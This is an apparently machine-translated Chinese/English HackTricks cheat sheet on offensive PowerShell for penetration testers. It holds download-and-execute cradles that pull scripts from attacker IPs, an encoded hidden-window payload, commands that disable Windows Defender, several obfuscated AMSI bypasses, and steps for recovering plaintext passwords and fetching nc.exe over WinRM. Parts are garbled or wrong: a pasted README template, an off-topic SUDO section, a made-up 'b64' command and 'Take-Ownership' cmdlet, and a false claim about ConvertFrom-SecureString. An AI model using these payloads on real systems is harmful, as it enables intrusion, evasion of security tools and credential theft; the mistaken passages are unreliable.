hacktricks/windows-hardening/basic-powershell-for-pentesters

基本的PowerShell技巧

☁️ HackTricks云平台 ☁️ -🐦 推特 🐦 - 🎙️ Twitch直播 🎙️ - 🎥 YouTube频道 🎥

• 你在一家网络安全公司工作吗？你想在HackTricks中看到你的公司广告吗？或者你想获得PEASS的最新版本或下载HackTricks的PDF吗？请查看订阅计划！
• 发现我们的独家NFTs收藏品The PEASS Family
• 获得官方PEASS和HackTricks周边产品
• 加入 💬 Discord群组 或 Telegram群组 或 关注我在Twitter上的🐦@carlospolopm.
• 通过向 hacktricks仓库 和 hacktricks-cloud仓库 提交PR来分享你的黑客技巧。

默认的PowerShell位置

C:\windows\syswow64\windowspowershell\v1.0\powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell

开始的基本PS命令

PowerShell (PS) 是一种功能强大的命令行工具，用于在Windows系统上执行各种任务。对于渗透测试人员来说，熟悉一些基本的PS命令是非常重要的。下面是一些常用的基本PS命令：

获取当前目录

Get-Location

此命令用于获取当前所在的目录。

切换目录

Set-Location <目录路径>

使用此命令可以切换到指定的目录。

列出目录内容

Get-ChildItem

使用此命令可以列出当前目录下的文件和子目录。

创建新目录

New-Item -ItemType Directory -Path <目录路径>

使用此命令可以在指定路径下创建新的目录。

复制文件或目录

Copy-Item -Path <源路径> -Destination <目标路径>

使用此命令可以复制文件或目录到指定的目标路径。

移动文件或目录

Move-Item -Path <源路径> -Destination <目标路径>

使用此命令可以将文件或目录移动到指定的目标路径。

删除文件或目录

Remove-Item -Path <路径> -Recurse

使用此命令可以删除指定的文件或目录。使用 -Recurse 参数可以删除目录及其内容。

显示文件内容

Get-Content <文件路径>

使用此命令可以显示指定文件的内容。

编辑文件

Set-Content -Path <文件路径> -Value <内容>

使用此命令可以编辑指定文件的内容。

运行脚本

.\<脚本文件名>.ps1

使用此命令可以运行指定的PowerShell脚本文件。

以上是一些基本的PS命令，它们可以帮助渗透测试人员在Windows系统上执行各种任务。熟练掌握这些命令将提高你的工作效率并加强你的技能。

Get-Help * #List everything loaded
Get-Help process #List everything containing "process"
Get-Help Get-Item -Full #Get full helpabout a topic
Get-Help Get-Item -Examples #List examples
Import-Module <modulepath>
Get-Command -Module <modulename>

下载和执行

To download and execute a file using PowerShell, you can use the following command:

Invoke-WebRequest -Uri <URL> -OutFile <OutputFile>; .\<OutputFile>

Replace <URL> with the URL of the file you want to download, and <OutputFile> with the desired name of the downloaded file.

使用PowerShell下载和执行文件，可以使用以下命令：

Invoke-WebRequest -Uri <URL> -OutFile <OutputFile>; .\<OutputFile>

将<URL>替换为要下载的文件的URL，将<OutputFile>替换为下载文件的所需名称。

This command uses the Invoke-WebRequest cmdlet to download the file from the specified URL and save it to the local system. The -OutFile parameter specifies the name of the output file.

该命令使用Invoke-WebRequest命令来从指定的URL下载文件并保存到本地系统。-OutFile参数指定输出文件的名称。

After the file is downloaded, the second part of the command (.<OutputFile>) executes the downloaded file.

文件下载完成后，命令的第二部分（.<OutputFile>）执行下载的文件。

This technique can be used to download and execute malicious files on a target system, so it should be used responsibly and only for legitimate purposes.

这种技术可以用于在目标系统上下载和执行恶意文件，因此应该负责任地使用，并且仅限于合法目的。

g
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
iex (iwr '10.10.14.9:8000/ipw.ps1') #From PSv3

$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://10.10.14.9:8000/ipw.ps1',$false);$h.send();iex $h.responseText
$wr = [System.NET.WebRequest]::Create("http://10.10.14.9:8000/ipw.ps1") $r = $wr.GetResponse() IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd(

#https://twitter.com/Alh4zr3d/status/1566489367232651264
#host a text record with your payload at one of your (unburned) domains and do this:
powershell . (nslookup -q=txt http://some.owned.domain.com)[-1]

使用 AMSI Bypass 后台下载和执行

This technique allows you to download and execute a file in the background while bypassing AMSI (Antimalware Scan Interface).

Usage

Invoke-WebRequest -Uri "http://example.com/file.exe" -OutFile "C:\path\to\file.exe"
Start-Process -FilePath "C:\path\to\file.exe" -WindowStyle Hidden

Replace "http://example.com/file.exe" with the URL of the file you want to download, and "C:\path\to\file.exe" with the desired path and filename for the downloaded file.

Explanation

1. The Invoke-WebRequest cmdlet is used to download the file from the specified URL and save it to the specified path.
2. The Start-Process cmdlet is used to execute the downloaded file in the background with a hidden window style.

By using this technique, you can download and execute a file without triggering any antivirus alerts that may be monitoring PowerShell commands. The AMSI bypass helps to evade detection by bypassing the antimalware scanning interface.

Start-Process -NoNewWindow powershell "-nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA="

在Linux中使用b64

The b64 command in Linux is a useful tool for encoding and decoding data in Base64 format. It can be used to convert binary data into a text format that is easily readable and transferable.

To encode a file using b64, you can use the following command:

b64 -e <input_file> > <output_file>

Replace <input_file> with the path to the file you want to encode, and <output_file> with the desired name and location for the encoded file.

To decode a file using b64, you can use the following command:

b64 -d <input_file> > <output_file>

Replace <input_file> with the path to the file you want to decode, and <output_file> with the desired name and location for the decoded file.

Using the b64 command in Linux can be helpful in various scenarios, such as encoding sensitive data for secure transmission or decoding encoded files received during a penetration test.

echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/shell.ps1')" | iconv -t UTF-16LE | base64 -w 0
powershell -nop -enc <BASE64_ENCODED_PAYLOAD>

下载

System.Net.WebClient

您可以使用System.Net.WebClient类来下载文件。以下是使用DownloadFile方法下载文件的示例代码：

$webClient = New-Object System.Net.WebClient
$url = "https://example.com/file.txt"
$destination = "C:\path\to\save\file.txt"
$webClient.DownloadFile($url, $destination)

在上面的示例中，我们创建了一个System.Net.WebClient对象，并指定了要下载的文件的URL和保存文件的目标路径。然后，我们使用DownloadFile方法将文件下载到指定的目标路径。

您还可以使用DownloadFileAsync方法来异步下载文件。以下是使用DownloadFileAsync方法下载文件的示例代码：

$webClient = New-Object System.Net.WebClient
$url = "https://example.com/file.txt"
$destination = "C:\path\to\save\file.txt"
$webClient.DownloadFileAsync($url, $destination)

使用DownloadFileAsync方法下载文件时，下载操作将在后台进行，不会阻塞当前线程。

请注意，下载文件时需要确保目标路径是有效的，并且具有足够的权限来保存文件。

(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")

调用-网络请求

Invoke-WebRequest 是 PowerShell 中的一个命令，用于发送 HTTP 或 HTTPS 请求并获取响应。它可以用于在渗透测试中执行各种网络操作，如获取网页内容、提交表单数据等。

语法

Invoke-WebRequest [-Uri] <string> [-Method <string>] [-Headers <hashtable>] [-Body <string>] [-ContentType <string>] [-UserAgent <string>] [-Proxy <Uri>] [-ProxyCredential <PSCredential>] [-TimeoutSec <int>] [-SessionVariable <string>] [-UseBasicParsing] [<CommonParameters>]

参数

• -Uri：指定要请求的 URL。
• -Method：指定请求的方法，如 GET、POST 等，默认为 GET。
• -Headers：指定请求的头部信息。
• -Body：指定请求的主体内容。
• -ContentType：指定请求的内容类型。
• -UserAgent：指定请求的用户代理。
• -Proxy：指定请求的代理服务器。
• -ProxyCredential：指定代理服务器的凭据。
• -TimeoutSec：指定请求的超时时间（以秒为单位）。
• -SessionVariable：指定将响应保存到的会话变量。
• -UseBasicParsing：使用基本解析器来解析 HTML 响应。

示例

以下示例演示了如何使用 Invoke-WebRequest 发送 HTTP 请求并获取响应：

$response = Invoke-WebRequest -Uri "https://www.example.com"
$response.Content

这将发送一个 GET 请求到 https://www.example.com 并将响应内容打印到控制台。

注意事项

• 在使用 Invoke-WebRequest 时，请确保已获得合法授权，并遵守适用的法律法规。
• 在渗透测试中使用 Invoke-WebRequest 时，应谨慎处理敏感信息，以免造成不必要的损失。

Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"

Wget

Wget is a command-line utility that allows you to download files from the web. It supports downloading files using various protocols such as HTTP, HTTPS, and FTP. Wget is available for multiple operating systems, including Windows.

To use Wget, open a command prompt and navigate to the directory where you want to save the downloaded file. Then, enter the following command:

wget [URL]

Replace [URL] with the URL of the file you want to download. Wget will retrieve the file and save it to the current directory.

You can also specify a different name for the downloaded file by using the -O option followed by the desired filename. For example:

wget -O myfile.txt [URL]

This will download the file from the specified URL and save it as myfile.txt in the current directory.

Wget also supports resuming interrupted downloads using the -c option. If a download is interrupted, you can resume it by running the same wget command again with the -c option.

In addition to downloading files, Wget can also be used to mirror entire websites, recursively download directories, and perform other advanced operations. Refer to the Wget documentation for more information on these features.

Note: When using Wget for any unauthorized activities, such as downloading copyrighted material without permission, you may be violating the law. Always ensure that you have the necessary rights and permissions before downloading any files.

wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"

BitsTransfer

BitsTransfer 是一种在 PowerShell 中使用的工具，用于在计算机之间传输文件。它可以帮助渗透测试人员在执行攻击时快速、高效地传输文件。

BitsTransfer 提供了一种简单的方法来下载和上传文件，而无需编写复杂的代码。它使用后台任务来处理文件传输，因此可以在后台运行，而不会干扰渗透测试人员的其他操作。

以下是一些常用的 BitsTransfer 命令：

• Start-BitsTransfer：启动文件传输任务。
• Get-BitsTransfer：获取当前正在运行的文件传输任务的状态。
• Complete-BitsTransfer：完成文件传输任务。
• Remove-BitsTransfer：移除文件传输任务。

渗透测试人员可以使用 BitsTransfer 来下载或上传文件，以便在目标系统上执行攻击。这可以帮助他们在渗透测试过程中获取所需的工具、脚本或其他文件。

请注意，渗透测试人员应该始终遵守法律和道德准则，并获得适当的授权才能执行任何攻击行为。

Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $output
# OR
Start-BitsTransfer -Source $url -Destination $output -Asynchronous

Base64 Kali & EncodedCommand

Base64 Kali

在渗透测试中，我们经常需要在目标系统上执行命令。为了避免在网络上传输明文命令，我们可以使用Base64编码来对命令进行编码。Kali Linux提供了一个方便的方法来执行Base64编码和解码。

要对命令进行Base64编码，可以使用以下命令：

echo -n "command" | base64

要对Base64编码进行解码，可以使用以下命令：

echo -n "base64_encoded_command" | base64 -d

EncodedCommand

在Windows渗透测试中，我们经常需要在目标系统上执行PowerShell命令。然而，由于命令中可能包含特殊字符，直接在命令行中执行可能会导致错误。为了解决这个问题，我们可以使用EncodedCommand参数来执行经过编码的PowerShell命令。

要生成经过编码的PowerShell命令，可以使用以下命令：

$command = "command"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)

然后，可以使用以下命令在目标系统上执行经过编码的PowerShell命令：

powershell.exe -EncodedCommand encoded_command

请注意，EncodedCommand参数只能在命令行中使用，而不能在PowerShell脚本中使用。

使用Base64编码和EncodedCommand参数，我们可以在渗透测试中更安全地执行命令，同时避免了特殊字符带来的问题。

kali> echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0
PS> powershell -EncodedCommand <Base64>

执行策略

受限语言

AppLocker策略

启用WinRM（远程PS）

enable-psremoting -force #This enables winrm

# Change NetWorkConnection Category to Private
#Requires -RunasAdministrator

Get-NetConnectionProfile |
Where{ $_.NetWorkCategory -ne 'Private'} |
ForEach {
$_
$_|Set-NetConnectionProfile -NetWorkCategory Private -Confirm
}

禁用Defender

{% code overflow="wrap" %}

# Check status
Get-MpComputerStatus
Get-MpPreference | select Exclusion* | fl #Check exclusions
# Disable
Set-MpPreference -DisableRealtimeMonitoring $true
#To completely disable Windows Defender on a computer, use the command:
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
# Set exclusion path
Set-MpPreference -ExclusionPath (pwd) -disablerealtimemonitoring
Add-MpPreference -ExclusionPath (pwd)

# Check exclusions configured via GPO
Parse-PolFile .\Registry.pol

KeyName : Software\Policies\Microsoft\Windows Defender\Exclusions
ValueName : Exclusions_Paths
ValueType : REG_DWORD
ValueLength : 4
ValueData : 1

KeyName : Software\Policies\Microsoft\Windows Defender\Exclusions\Paths
ValueName : C:\Windows\Temp
ValueType : REG_SZ
ValueLength : 4
ValueData : 0

{% endcode %}

AMSI绕过

amsi.dll 被加载到你的进程中，并且具有与任何应用程序进行交互所需的导出函数。由于它被加载到你所控制的进程的内存空间中，你可以通过覆盖内存中的指令来改变它的行为，使其无法检测到任何东西。

因此，你的目标是通过在内存中覆盖该DLL的指令，使检测变得无效。

AMSI绕过生成器网页：https://amsi.fail/

# A Method
[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)

# Another: from https://github.com/tihanyin/PSSW100AVB/blob/main/AMSI_bypass_2021_09.ps1
$A="5492868772801748688168747280728187173688878280688776828"
$B="1173680867656877679866880867644817687416876797271"
[Ref].Assembly.GetType([string](0..37|%{[char][int](29+($A+$B).
substring(($_*2),2))})-replace " " ).
GetField([string](38..51|%{[char][int](29+($A+$B).
substring(($_*2),2))})-replace " ",'NonPublic,Static').
SetValue($null,$true)

# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
[Ref].Assembly.GetType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzAA==')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwA=')))).SetValue($null,$true)

# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
&( $SHELLid[1]+$SHELlId[13]+'X') (NeW-OBJEct sYStEm.iO.coMPrESSIOn.defLAtEstReam( [iO.meMorYStReAm] [cOnvErt]::froMBaSE64StRINg( 'rVHRasJAEHzvdwhGkBAhLUXwYU7i2aKFq4mQBh8Sc6bBM5HkYmq/vruQfkF7L3s7s8vM3CXv+nRw0bb6kpm7K7UN71ftjJwk1F/WDapjnZdVcZjPo6qku+aRnW0Ic5JlXd10Y4lcNfVFpK1+8gduHPXiEestcggD6WFTiDfIAFkhPiGP+FDCQkbce1j6UErMsFbIesYD3rtCPhOPDgHtKfENecZe0TzVDNRjsRhP6LCpValN/g/GYzZGxlMlXiF9rh6CGISToZ6Nn3+Fp3+XCwtxY5kIlF++cC6S2WIDEfJ7xEPeuMeQdaftPjUdfVLVGTMd2abTk4cf'), [sysTEm.iO.cOmpResSioN.COMprEssiOnMOde]::decOMPRESs ) | foreAch{NeW-OBJEct iO.STREaMREadER( $_ , [teXt.ENCoDiNg]::aScii )}).REadtoenD( )

# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
${2}=[Ref].Assembly.GetType('Sy'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwB0AGUA')))+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQAuAE0A')))+'an'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBnAGUA')))+'m'+'en'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dAAuAEEAdQA=')))+'t'+'om'+'at'+'io'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgAuAEEA')))+'ms'+'i'+'U'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dABpAGwA')))+'s')
${1}=${2}.GetField('am'+'s'+'iI'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBpAHQA')))+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RgBhAGkAbAA=')))+'ed','No'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBQAHUA')))+'bl'+'i'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YwAsAFMA')))+'ta'+'ti'+'c')
${1}.SetValue($null,$true)

# Another Method
$a = 'System.Management.Automation.A';$b = 'ms';$u = 'Utils'
$assembly = [Ref].Assembly.GetType(('{0}{1}i{2}' -f $a,$b,$u))
$field = $assembly.GetField(('a{0}iInitFailed' -f $b),'NonPublic,Static')
$field.SetValue($null,$true)

# AMSI Bypass in python
https://fluidattacks.com/blog/amsi-bypass-python/

# Testing for Amsi Bypass:
https://github.com/rasta-mouse/AmsiScanBufferBypass

# Amsi-Bypass-Powershell
https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell

https://blog.f-secure.com/hunting-for-amsi-bypasses/
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans
https://slaeryan.github.io/posts/falcon-zero-alpha.html

AMSI绕过2 - 托管API调用挂钩

查看此帖子以获取详细信息和代码。

这种新技术依赖于对.NET方法的API调用挂钩。事实证明，.NET方法需要在内存中编译为本机机器指令，这些指令看起来与本机方法非常相似。这些编译后的方法可以被挂钩以改变程序的控制流。

执行对.NET方法的API调用挂钩的步骤如下：

1. 确定要挂钩的目标方法
2. 定义一个与目标方法具有相同函数原型的方法
3. 使用反射找到这些方法
4. 确保每个方法已经被编译
5. 找到每个方法在内存中的位置
6. 用指向我们恶意方法的指令覆盖目标方法

PS-History

Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt

获取权限

To perform various actions on a Windows system, it is often necessary to have the appropriate permissions. In this section, we will explore how to use PowerShell to check and modify permissions.

Checking Permissions

To check the permissions of a file or directory, we can use the Get-Acl cmdlet. This cmdlet retrieves the access control list (ACL) for the specified object.

Get-Acl -Path C:\path\to\file.txt

This command will display the permissions associated with the specified file.

Modifying Permissions

To modify permissions, we can use the Set-Acl cmdlet. This cmdlet allows us to change the ACL of a file or directory.

Set-Acl -Path C:\path\to\file.txt -AclObject $acl

In this command, $acl represents the new ACL that we want to apply to the file.

Taking Ownership

Sometimes, it may be necessary to take ownership of a file or directory in order to modify its permissions. To do this, we can use the Take-Ownership function.

Take-Ownership -Path C:\path\to\file.txt

This function will change the ownership of the specified file to the current user.

Summary

In this section, we have learned how to use PowerShell to check and modify permissions on a Windows system. By understanding and manipulating permissions, we can gain greater control over the system and perform various actions as needed.

Get-Acl -Path "C:\Program Files\Vuln Services" | fl

操作系统版本和热补丁

To gather information about the operating system version and installed hotfixes, you can use the following PowerShell commands:

# Get the operating system version
(Get-WmiObject -Class Win32_OperatingSystem).Caption

# Get the installed hotfixes
Get-HotFix

The first command retrieves the operating system version using the Win32_OperatingSystem class. The Caption property contains the name of the operating system.

The second command retrieves the installed hotfixes using the Get-HotFix cmdlet. This cmdlet provides information about the hotfixes installed on the system, including the hotfix ID, description, and installation date.

By running these commands, you can gather important information about the operating system version and any installed hotfixes, which can be useful for vulnerability assessment and system hardening.

[System.Environment]::OSVersion.Version #Current OS version
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
Get-Hotfix -description "Security update" #List only "Security Update" patches

环境

---

Prerequisites

Windows

• Windows 10 or Windows Server 2016/2019
• PowerShell 5.1 or later

PowerShell Execution Policy

Before running any PowerShell scripts, you need to set the execution policy to allow script execution. Open a PowerShell session as an administrator and run the following command:

Set-ExecutionPolicy Unrestricted

---

先决条件

Windows

• Windows 10 或 Windows Server 2016/2019
• PowerShell 5.1 或更高版本

PowerShell 执行策略

在运行任何 PowerShell 脚本之前，您需要设置执行策略以允许脚本执行。以管理员身份打开 PowerShell 会话，并运行以下命令：

Set-ExecutionPolicy Unrestricted

---

Installation

1. Clone the repository:

git clone https://github.com/username/repo.git

2. Change into the project directory:

cd repo

3. Install the required dependencies:

pip install -r requirements.txt

---

安装

1. 克隆存储库：

git clone https://github.com/username/repo.git

2. 切换到项目目录：

cd repo

3. 安装所需的依赖项：

pip install -r requirements.txt

---

Usage

1. Open a PowerShell session.

2. Change into the project directory:

cd path/to/project

3. Run the PowerShell script:

.\script.ps1

---

用法

1. 打开 PowerShell 会话。

2. 切换到项目目录：

cd path/to/project

3. 运行 PowerShell 脚本：

.\script.ps1

---

Contributing

Contributions are welcome! For major changes, please open an issue first to discuss what you would like to change.

---

贡献

欢迎贡献！对于重大更改，请先打开一个问题以讨论您想要更改的内容。

---

Get-ChildItem Env: | ft Key,Value #get all values
$env:UserName @Get UserName value

其他已连接的驱动器

When conducting a penetration test on a Windows system, it is important to gather as much information as possible about the target. One valuable piece of information is the list of connected drives on the system. This can help identify additional storage devices or network shares that may contain sensitive data.

In PowerShell, you can use the Get-PSDrive cmdlet to retrieve a list of all connected drives. This cmdlet provides information about both local and remote drives, including drive letters, drive types, and the root directory of each drive.

To retrieve the list of connected drives, open a PowerShell session and run the following command:

Get-PSDrive

This will display a table with information about each drive, including the drive letter, drive type, and root directory. The drive type can be one of the following:

• FileSystem: This indicates a local disk drive.
• Registry: This indicates a registry hive.
• Alias: This indicates a PowerShell alias.
• Variable: This indicates a PowerShell variable.
• Function: This indicates a PowerShell function.
• Certificate: This indicates a certificate store.
• Environment: This indicates an environment variable.

By examining the list of connected drives, you can identify any additional storage devices or network shares that may be of interest during your penetration test. This information can help you further explore the target system and potentially discover vulnerabilities or sensitive data.

Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root

回收站

The Recycle Bin is a feature in Windows that allows users to temporarily store deleted files and folders. Instead of permanently deleting files, they are moved to the Recycle Bin where they can be easily restored if needed. This provides a safety net for users who accidentally delete important files.

The Recycle Bin can be accessed by double-clicking on its icon on the desktop or by opening the File Explorer and navigating to the Recycle Bin folder. Once inside the Recycle Bin, users can browse through the deleted files and folders, and choose to restore them to their original location or permanently delete them.

It is important to note that the Recycle Bin has a storage limit, and once it reaches its maximum capacity, older files will be automatically deleted to make room for new ones. Therefore, it is recommended to regularly empty the Recycle Bin to free up disk space.

As a pentester, it is crucial to be aware of the Recycle Bin as it can potentially contain sensitive information that has been deleted by the user. By accessing the Recycle Bin, a pentester may be able to recover deleted files and gain valuable insights or leverage them for further exploitation.

$shell = New-Object -com shell.application
$rb = $shell.Namespace(10)
$rb.Items()

https://jdhitsolutions.com/blog/powershell/7024/managing-the-recycle-bin-with-powershell/

域名侦查

{% content-ref url="powerview.md" %} powerview.md {% endcontent-ref %}

用户

Get-LocalUser | ft Name,Enabled,Description,LastLogon
Get-ChildItem C:\Users -Force | select Name

将安全字符串转换为明文

When performing penetration testing or other security assessments, it is common to encounter scenarios where sensitive information, such as passwords or encryption keys, is stored as secure strings in PowerShell scripts or configurations. Secure strings are encrypted and can only be decrypted on the same machine and by the same user who encrypted them.

在进行渗透测试或其他安全评估时，经常会遇到将敏感信息（如密码或加密密钥）存储为安全字符串的 PowerShell 脚本或配置的情况。安全字符串是加密的，只能在同一台计算机上由同一用户解密。

To extract the plaintext value from a secure string, you can use the ConvertFrom-SecureString cmdlet in PowerShell. This cmdlet converts the secure string into an encrypted standard string representation. However, this representation is specific to the user and machine that performed the conversion.

要从安全字符串中提取明文值，可以使用 PowerShell 中的 ConvertFrom-SecureString 命令。该命令将安全字符串转换为加密的标准字符串表示。但是，此表示仅适用于执行转换的用户和计算机。

Here is an example of how to use the ConvertFrom-SecureString cmdlet:

以下是使用 ConvertFrom-SecureString 命令的示例：

$secureString = Read-Host -AsSecureString
$plainText = $secureString | ConvertFrom-SecureString
$plainText

In this example, the Read-Host cmdlet is used to securely prompt the user for a password and store it as a secure string in the $secureString variable. Then, the ConvertFrom-SecureString cmdlet is used to convert the secure string into a plaintext representation, which is stored in the $plainText variable. Finally, the plaintext value is displayed.

在此示例中，使用 Read-Host 命令以安全方式提示用户输入密码，并将其作为安全字符串存储在 $secureString 变量中。然后，使用 ConvertFrom-SecureString 命令将安全字符串转换为明文表示，并将其存储在 $plainText 变量中。最后，显示明文值。

It is important to note that extracting the plaintext value from a secure string should only be done when necessary and with caution, as it can expose sensitive information. Additionally, the plaintext value should be handled securely and not stored in plain text.

需要注意的是，只有在必要时并且谨慎地提取安全字符串的明文值，因为它可能会暴露敏感信息。此外，明文值应该以安全的方式处理，不应以明文形式存储。

$pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692" | convertto-securestring
$user = "HTB\Tom"
$cred = New-Object System.management.Automation.PSCredential($user, $pass)
$cred.GetNetworkCredential() | fl

UserName       : Tom
Password       : 1ts-mag1c!!!
SecurePassword : System.Security.SecureString
Domain         : HTB

或者直接解析XML表单：

$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *

UserName       : Tom
Password       : 1ts-mag1c!!!
SecurePassword : System.Security.SecureString
Domain         : HTB

SUDO

SUDO 是一种在 Linux 和 Unix 系统上使用的命令，它允许普通用户以超级用户的身份执行特权命令。这对于系统管理员和安全专业人员来说非常有用，因为它提供了一种限制用户权限的方法，以防止滥用和潜在的安全漏洞。

SUDO 的基本语法如下：

sudo [选项] 命令

其中，选项 是一些可选参数，命令 是要执行的特权命令。

以下是一些常用的 SUDO 选项：

• -u：指定要以哪个用户的身份执行命令。
• -l：列出当前用户可以执行的命令。
• -i：以目标用户的身份启动一个新的 shell。
• -s：以目标用户的身份执行命令，但保留当前用户的环境变量。

使用 SUDO 时，需要输入当前用户的密码来验证身份。如果验证成功，就可以执行特权命令。

SUDO 还可以通过配置文件 /etc/sudoers 进行自定义设置。该文件定义了哪些用户可以使用 SUDO，以及可以执行哪些命令。

在进行渗透测试时，SUDO 是一个非常有用的工具，因为它可以帮助我们以超级用户的身份执行命令，从而获取更高的权限和访问系统的敏感信息。然而，使用 SUDO 时需要谨慎，确保只执行必要的命令，并避免滥用权限。

#CREATE A CREDENTIAL OBJECT
$pass = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("<USERNAME>", $pass)

#For local:
Start-Process -Credential ($cred)  -NoNewWindow powershell "iex (New-Object Net.WebClient).DownloadString('http://10.10.14.11:443/ipst.ps1')"

#For WINRM
#CHECK IF CREDENTIALS ARE WORKING EXECUTING whoami (expected: username of the credentials user)
Invoke-Command -Computer ARKHAM -ScriptBlock { whoami } -Credential $cred
#DOWNLOAD nc.exe
Invoke-Command -Computer ARKHAM -ScriptBlock { IWR -uri 10.10.14.17/nc.exe -outfile nc.exe } -credential $cred

Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process C:\xyz\nc.bat -verb Runas}'

#Another method
$secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
$computer = "<hostname>"

用户组

In Windows, user groups are used to manage and control access to resources. Each user account is assigned to one or more groups, and these groups determine the permissions and privileges that the user has on the system.

在Windows中，用户组用于管理和控制对资源的访问。每个用户帐户都分配给一个或多个组，这些组确定用户在系统上拥有的权限和特权。

Built-in Groups

内置组

Windows includes several built-in groups that have predefined permissions and privileges. These groups are created during the installation of the operating system and are used to manage various aspects of the system.

Windows包含几个内置组，这些组具有预定义的权限和特权。这些组在操作系统安装过程中创建，并用于管理系统的各个方面。

Here are some commonly used built-in groups:

以下是一些常用的内置组：

• Administrators: This group has full control over the system and can perform any administrative task.

• Administrators：该组对系统拥有完全控制权，并可以执行任何管理任务。

• Users: This group includes all standard user accounts and has limited privileges.

• Users：该组包括所有标准用户帐户，并具有有限的特权。

• Guests: This group provides limited access to the system and is intended for temporary or guest users.

• Guests：该组为系统提供有限访问权限，适用于临时或访客用户。

• Power Users: This group has additional privileges compared to standard users, but less than administrators.

• Power Users：该组相比于标准用户具有额外的特权，但比管理员少。

